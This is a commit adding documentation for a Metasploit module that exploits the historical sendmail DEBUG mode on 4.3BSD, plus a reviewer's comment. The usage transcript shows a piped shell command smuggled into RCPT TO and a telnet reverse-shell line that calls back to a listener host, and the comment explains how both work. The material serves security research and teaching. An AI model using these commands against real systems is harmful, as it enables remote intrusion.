Add module doc
parent 58a6c4137d
commit 8a6075c882
@@ -0,0 +1,101 @@

## Intro

This module exploits `sendmail`'s well-known historical debug mode to
escape to a shell and execute commands in the SMTP `RCPT TO` command.

This vulnerability was exploited by the Morris worm in 1988-11-02.
Cliff Stoll reports on the worm in the epilogue of *The Cuckoo's Egg*.

## Setup

A Docker environment for 4.3BSD on VAX is available at
<https://github.com/wvu/ye-olde-bsd>.

For manual setup, please follow the Computer History Wiki's
[guide](http://gunkies.org/wiki/Installing_4.3_BSD_on_SIMH) or Allen
Garvin's [guide](http://plover.net/~agarvin/4.3bsd-on-simh.html) if
you're using [Quasijarus](http://gunkies.org/wiki/4.3_BSD_Quasijarus).

## Targets

```
Id Name
-- ----
0 @(#)version.c 5.51 (Berkeley) 5/2/86
```

## Options

**RPORT**

Set this to the target port. The default is 25 for `sendmail`, but the
port may be forwarded when NAT (SLiRP) is used in SIMH.

**PAYLOAD**

Set this to a Unix command payload. Currently only `cmd/unix/reverse`
and `cmd/unix/generic` are supported.

## Usage

```
msf5 exploit(unix/smtp/morris_sendmail_debug) > options

Module options (exploit/unix/smtp/morris_sendmail_debug):

Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 127.0.0.1 yes The target address range or CIDR identifier
RPORT 25 yes The target port (TCP)


Payload options (cmd/unix/reverse):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.1.5 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
0 @(#)version.c 5.51 (Berkeley) 5/2/86


msf5 exploit(unix/smtp/morris_sendmail_debug) > run

[*] Started reverse TCP double handler on 192.168.1.5:4444
[*] 127.0.0.1:25 - Connecting to sendmail
[*] 127.0.0.1:25 - Enabling debug mode and sending exploit
[*] 127.0.0.1:25 - Sending: DEBUG
[*] 127.0.0.1:25 - Sending: MAIL FROM:<GmWE2vWEViR4CLhBWOOOUVSMjJEr2NymDveA>
[*] 127.0.0.1:25 - Sending: RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">
[*] 127.0.0.1:25 - Sending: DATA
[*] 127.0.0.1:25 - Sending: PATH=/bin:/usr/bin:/usr/ucb:/etc
[*] 127.0.0.1:25 - Sending: export PATH
[*] 127.0.0.1:25 - Sending: sh -c '(sleep 4197|telnet 192.168.1.5 4444|while : ; do sh && break; done 2>&1|telnet 192.168.1.5 4444 >/dev/null 2>&1 &)'
[*] 127.0.0.1:25 - Sending: .
[*] 127.0.0.1:25 - Sending: QUIT
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo zqhqKJD7trW0E0Lp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "zqhqKJD7trW0E0Lp\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (192.168.1.5:4444 -> 192.168.1.5:64337) at 2018-10-20 14:08:03 -0500
[!] 127.0.0.1:25 - Do NOT type `exit', or else you may lose further shells!
[!] 127.0.0.1:25 - Hit ^C to abort the session instead, please and thank you

whoami
daemon
cat /etc/motd
4.3 BSD UNIX #1: Fri Jun 6 19:55:29 PDT 1986

Would you like to play a game?
```
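Review bot: the Usage transcript warns "Do NOT type `exit'" without saying why, and the reason is right there in the payload line a few lines earlier: the shell is kept alive by `while : ; do sh && break; done`, so `exit` makes `sh` return success, `break` leaves the loop, and the `telnet` pipeline closes with nothing left to reconnect; one sentence under **PAYLOAD** (or beside the warning) explaining this would save users a lost session. Two smaller points in the same file: the Intro says the shell escape happens "in the SMTP `RCPT TO` command" but never says that the preceding `DEBUG` command is what makes sendmail accept a piped program (`RCPT TO:<"| sed '1,/^$/d' | sh; exit 0">`) as a recipient, nor that `sed '1,/^$/d'` strips the message headers so only the `DATA` body reaches `sh`; the transcript shows all of this, so spelling it out in Intro is cheap. Also "exploited by the Morris worm in 1988-11-02" should read "on 1988-11-02", and since Setup points at Quasijarus while Targets lists only `@(#)version.c 5.51 (Berkeley) 5/2/86`, it is worth stating whether a Quasijarus install presents that same version string or needs a separate target.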